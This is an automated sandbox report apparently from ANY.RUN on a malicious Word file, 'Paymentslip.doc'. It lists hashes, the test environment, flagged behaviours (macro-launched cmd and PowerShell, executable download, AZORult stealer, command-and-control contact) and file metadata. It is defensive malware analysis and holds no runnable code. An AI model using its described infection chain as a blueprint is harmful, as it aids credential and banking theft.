Malware analysis Paymentslip.doc Malicious activity | ANY.RUN

analyze malware

Huge database of samples and IOCs
Custom VM setup
Unlimited submissions
Interactive approach

Add for printing

File name:	Paymentslip.doc
Full analysis:	https://app.any.run/tasks/819730f4-5b70-4857-a057-48d2c55f3b33
Verdict:	Malicious activity
Threats:	AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	December 06, 2018, 01:09:19
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	opendir loader trojan rat azorult
Indicators:
MIME:	text/xml
File info:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:	BB8C9DB2445E7ECC4E4EEFC6ED1CB418
SHA1:	A5E390676EE75888494C3150ED913BF70882E9C6
SHA256:	FD24DE4D53E61EB7CD0C7B7B99552361DB2024B456568CB14ACCD6F59ADC3363
SSDEEP:	6144:+M516FgSNHUfWFqupSBUKTrOwl0hsXUEM9y:z6FgZWB0nOwl0hsXUEuy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (68.0.3440.106)
Google Update Helper (1.3.33.17)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 3464)
- Unusual execution from Microsoft Office
  - WINWORD.EXE (PID: 3464)
- Executes PowerShell scripts
  - cmd.exe (PID: 2580)
- Application was dropped or rewritten from another process
  - WindowsUpdate.exe (PID: 2396)
  - WindowsUpdate.exe (PID: 3616)
  - WindowsUpdate.exe (PID: 3864)
  - WindowsUpdate.exe (PID: 3728)
- Downloads executable files from the Internet
  - powershell.exe (PID: 3104)
- AZORULT was detected
  - WindowsUpdate.exe (PID: 3864)
- Connects to CnC server
  - WindowsUpdate.exe (PID: 3864)
- Changes the autorun value in the registry
  - WindowsUpdate.exe (PID: 2396)
  - WindowsUpdate.exe (PID: 3616)
- Loads dropped or rewritten executable
  - WindowsUpdate.exe (PID: 3864)
- Actions looks like stealing of personal data
  - WindowsUpdate.exe (PID: 3864)
SUSPICIOUS
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3104)
  - WindowsUpdate.exe (PID: 2396)
  - WindowsUpdate.exe (PID: 3616)
  - WindowsUpdate.exe (PID: 3864)
- Creates files in the user directory
  - powershell.exe (PID: 3104)
  - WindowsUpdate.exe (PID: 3864)
- Application launched itself
  - WindowsUpdate.exe (PID: 2396)
  - WindowsUpdate.exe (PID: 3616)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3464)
- Creates files in the user directory
  - WINWORD.EXE (PID: 3464)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xml	\|	Microsoft Office XML Flat File Format Word Document (ASCII) (43.7)
.rels	\|	Open Office XML Relationships (28.2)
.xml	\|	Microsoft Office XML Flat File Format (ASCII) (20.8)
.svg	\|	Scalable Vector Graphics (var.3) (4.5)
.xml	\|	Generic XML (ASCII) (1.5)

EXIF

XMP

PackagePartXmlDataWebSettingsAllowPNG:	-
PackagePartXmlDataWebSettingsOptimizeForBrowser:	-
PackagePartXmlDataWebSettingsIgnorable:	w14 w15
PackagePartXmlDataFontsFontSigCsb1:	00000000
PackagePartXmlDataFontsFontSigCsb0:	0000019F
PackagePartXmlDataFontsFontSigUsb3:	00000000
PackagePartXmlDataFontsFontSigUsb2:	00000001
PackagePartXmlDataFontsFontSigUsb1:	4000ACFF
PackagePartXmlDataFontsFontSigUsb0:	E00002FF
PackagePartXmlDataFontsFontPitchVal:	variable
PackagePartXmlDataFontsFontFamilyVal:	swiss
PackagePartXmlDataFontsFontCharsetVal:	00
PackagePartXmlDataFontsFontPanose1Val:	020F0502020204030204
PackagePartXmlDataFontsFontName:	Calibri
PackagePartXmlDataFontsIgnorable:	w14 w15
PackagePartXmlDataCorePropertiesModified:	2018:12:04 06:17:00Z
PackagePartXmlDataCorePropertiesModifiedType:	dcterms:W3CDTF
PackagePartXmlDataCorePropertiesCreated:	2018:12:04 06:17:00Z
PackagePartXmlDataCorePropertiesCreatedType:	dcterms:W3CDTF
PackagePartXmlDataCorePropertiesRevision:	1
PackagePartXmlDataCorePropertiesLastModifiedBy:	gtst1
PackagePartXmlDataCorePropertiesDescription:	-
PackagePartXmlDataCorePropertiesKeywords:	-
PackagePartXmlDataCorePropertiesCreator:	gtst1
PackagePartXmlDataCorePropertiesSubject:	-
PackagePartXmlDataCorePropertiesTitle:	-
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW:	108
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW:	-
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW:	108
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW:	-
PackagePartXmlDataStylesStyleTblPrTblIndType:	dxa
PackagePartXmlDataStylesStyleTblPrTblIndW:	-
PackagePartXmlDataStylesStyleUnhideWhenUsed:	-
PackagePartXmlDataStylesStyleSemiHidden:	-
PackagePartXmlDataStylesStyleUiPriorityVal:	1
PackagePartXmlDataStylesStyleQFormat:	-
PackagePartXmlDataStylesStyleNameVal:	Normal
PackagePartXmlDataStylesStyleStyleId:	Normal
PackagePartXmlDataStylesStyleDefault:	1
PackagePartXmlDataStylesStyleType:	paragraph
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed:	1
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden:	1
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat:	1
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority:	-
PackagePartXmlDataStylesLatentStylesLsdExceptionName:	Normal
PackagePartXmlDataStylesLatentStylesCount:	371
PackagePartXmlDataStylesLatentStylesDefQFormat:	-
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed:	-
PackagePartXmlDataStylesLatentStylesDefSemiHidden:	-
PackagePartXmlDataStylesLatentStylesDefUIPriority:	99
PackagePartXmlDataStylesLatentStylesDefLockedState:	-
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule:	auto
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine:	259
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter:	160
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi:	ar-SA
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia:	en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal:	en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal:	22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal:	22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme:	minorBidi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme:	minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme:	minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme:	minorHAnsi
PackagePartXmlDataStylesIgnorable:	w14 w15
PackagePartXmlDataPropertiesAppVersion:	15
PackagePartXmlDataPropertiesHyperlinksChanged:	-
PackagePartXmlDataPropertiesSharedDoc:	-
PackagePartXmlDataPropertiesCharactersWithSpaces:	2
PackagePartXmlDataPropertiesLinksUpToDate:	-
PackagePartXmlDataPropertiesCompany:	-
PackagePartXmlDataPropertiesScaleCrop:	-
PackagePartXmlDataPropertiesParagraphs:	1
PackagePartXmlDataPropertiesLines:	1
PackagePartXmlDataPropertiesDocSecurity:	-
PackagePartXmlDataPropertiesApplication:	Microsoft Office Word
PackagePartXmlDataPropertiesCharacters:	2
PackagePartXmlDataPropertiesWords:	-
PackagePartXmlDataPropertiesPages:	1
PackagePartXmlDataPropertiesTotalTime:	-
PackagePartXmlDataPropertiesTemplate:	Normal
PackagePartXmlDataPropertiesXmlns:	http://schemas.openxmlformats.org/officeDocument/2006/extended-properties
PackagePartXmlDataSettingsDocIdVal:	{587BFEAE-043A-4C54-8D39-E3BC2D30D35D}
PackagePartXmlDataSettingsChartTrackingRefBased:	-
PackagePartXmlDataSettingsListSeparatorVal:	,
PackagePartXmlDataSettingsDecimalSymbolVal:	.
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData:	1
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt:	edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt:	edit
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax:	1026
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt:	edit
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink:	followedHyperlink
PackagePartXmlDataSettingsClrSchemeMappingHyperlink:	hyperlink
PackagePartXmlDataSettingsClrSchemeMappingAccent6:	accent6
PackagePartXmlDataSettingsClrSchemeMappingAccent5:	accent5
PackagePartXmlDataSettingsClrSchemeMappingAccent4:	accent4
PackagePartXmlDataSettingsClrSchemeMappingAccent3:	accent3
PackagePartXmlDataSettingsClrSchemeMappingAccent2:	accent2
PackagePartXmlDataSettingsClrSchemeMappingAccent1:	accent1
PackagePartXmlDataSettingsClrSchemeMappingT2:	dark2
PackagePartXmlDataSettingsClrSchemeMappingBg2:	light2
PackagePartXmlDataSettingsClrSchemeMappingT1:	dark1
PackagePartXmlDataSettingsClrSchemeMappingBg1:	light1
PackagePartXmlDataSettingsThemeFontLangVal:	en-US
PackagePartXmlDataSettingsMathPrNaryLimVal:	undOvr
PackagePartXmlDataSettingsMathPrIntLimVal:	subSup
PackagePartXmlDataSettingsMathPrWrapIndentVal:	1440
PackagePartXmlDataSettingsMathPrDefJcVal:	centerGroup
PackagePartXmlDataSettingsMathPrRMarginVal:	-
PackagePartXmlDataSettingsMathPrLMarginVal:	-
PackagePartXmlDataSettingsMathPrDispDef:	-
PackagePartXmlDataSettingsMathPrSmallFracVal:	-
PackagePartXmlDataSettingsMathPrBrkBinSubVal:	--
PackagePartXmlDataSettingsMathPrBrkBinVal:	before
PackagePartXmlDataSettingsMathPrMathFontVal:	Cambria Math
PackagePartXmlDataSettingsRsidsRsidVal:	002C3C24
PackagePartXmlDataSettingsRsidsRsidRootVal:	007D1537
PackagePartXmlDataSettingsCompatCompatSettingVal:	15
PackagePartXmlDataSettingsCompatCompatSettingUri:	http://schemas.microsoft.com/office/word
PackagePartXmlDataSettingsCompatCompatSettingName:	compatibilityMode
PackagePartXmlDataSettingsCharacterSpacingControlVal:	doNotCompress
PackagePartXmlDataSettingsDefaultTabStopVal:	720
PackagePartXmlDataSettingsZoomPercent:	100
PackagePartXmlDataSettingsIgnorable:	w14 w15
PackagePartXmlDataVbaSuppDataMcdsMcdCmg:	56
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt:	00
PackagePartXmlDataVbaSuppDataMcdsMcdName:	Project.KddmFc.f_GrZsRq5L9VLDbWySHE
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName:	PROJECT.KDDMFC.F_GRZSRQ5L9VLDBWYSHE
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen:	-
PackagePartXmlDataVbaSuppDataIgnorable:	w14 w15 wp14
PackagePartXmlDataThemeExtLstExtThemeFamilyVid:	{4A3C46E8-61CC-4603-A589-7422A47A8E4A}
PackagePartXmlDataThemeExtLstExtThemeFamilyId:	{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}
PackagePartXmlDataThemeExtLstExtThemeFamilyName:	Office Theme
PackagePartXmlDataThemeExtLstExtUri:	{05A4C25C-085E-4340-85A3-A5531E510DB2}
PackagePartXmlDataThemeExtraClrSchemeLst:	-
PackagePartXmlDataThemeObjectDefaults:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng:	5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal:	102000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal:	98000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal:	150000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal:	93000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape:	1
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal:	170000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal:	95000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal:	63000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal:	000000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn:	ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir:	5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist:	19050
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad:	57150
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim:	800000
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal:	solid
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn:	ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd:	sng
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap:	flat
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW:	6350
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal:	100000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng:	5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal:	67000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal:	105000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal:	110000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape:	1
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeName:	Office
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface:	ＭＳ明朝
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript:	Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose:	020F0502020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface:	Calibri
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface:	ＭＳゴシック
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript:	Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose:	020F0302020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface:	Calibri Light
PackagePartXmlDataThemeThemeElementsFontSchemeName:	Office
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal:	954F72
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal:	0563C1
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal:	70AD47
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal:	4472C4
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal:	FFC000
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal:	A5A5A5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal:	ED7D31
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal:	5B9BD5
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal:	E7E6E6
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal:	44546A
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr:	FFFFFF
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal:	window
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr:	000000
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal:	windowText
PackagePartXmlDataThemeThemeElementsClrSchemeName:	Office
PackagePartXmlDataThemeName:	Office Theme
PackagePartCompression:	store
PackagePartBinaryData:	(Binary data 130316 bytes, use -b option to extract)
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch:	360
PackagePartXmlDataDocumentBodySectPrColsSpace:	720
PackagePartXmlDataDocumentBodySectPrPgMarGutter:	-
PackagePartXmlDataDocumentBodySectPrPgMarFooter:	720
PackagePartXmlDataDocumentBodySectPrPgMarHeader:	720
PackagePartXmlDataDocumentBodySectPrPgMarLeft:	1440
PackagePartXmlDataDocumentBodySectPrPgMarBottom:	1440
PackagePartXmlDataDocumentBodySectPrPgMarRight:	1440
PackagePartXmlDataDocumentBodySectPrPgMarTop:	1440
PackagePartXmlDataDocumentBodySectPrPgSzH:	15840
PackagePartXmlDataDocumentBodySectPrPgSzW:	12240
PackagePartXmlDataDocumentBodySectPrRsidR:	002C3C24
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst:	rect
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy:	4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx:	4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri:	{28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed:	rId5
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId:	1
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri:	http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName:	Picture 1
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId:	1
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy:	4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx:	4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineDistR:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistL:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistB:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistT:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomAvLst:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomPrst:	rect
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCy:	4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCx:	4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffY:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffX:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillStretchFillRect:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUri:	{28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipEmbed:	rId5
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPicPr:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrName:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrId:	2
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataUri:	http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingAnchorCNvGraphicFramePr:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrName:	Picture 2
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrId:	2
PackagePartXmlDataDocumentBodyPRDrawingAnchorWrapNone:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentB:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentR:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentT:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentL:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCy:	4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCx:	4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVPosOffset:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVRelativeFrom:	paragraph
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHPosOffset:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHRelativeFrom:	column
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosY:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosX:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorAllowOverlap:	1
PackagePartXmlDataDocumentBodyPRDrawingAnchorLayoutInCell:	1
PackagePartXmlDataDocumentBodyPRDrawingAnchorLocked:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorBehindDoc:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorRelativeHeight:	251658240
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePos:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistR:	114300
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistL:	114300
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistB:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistT:	-
PackagePartXmlDataDocumentBodyPRRPrNoProof:	-
PackagePartXmlDataDocumentBodyPBookmarkEndId:	-
PackagePartXmlDataDocumentBodyPBookmarkStartName:	_GoBack
PackagePartXmlDataDocumentBodyPBookmarkStartId:	-
PackagePartXmlDataDocumentBodyPRsidRDefault:	007D1537
PackagePartXmlDataDocumentBodyPRsidR:	002C3C24
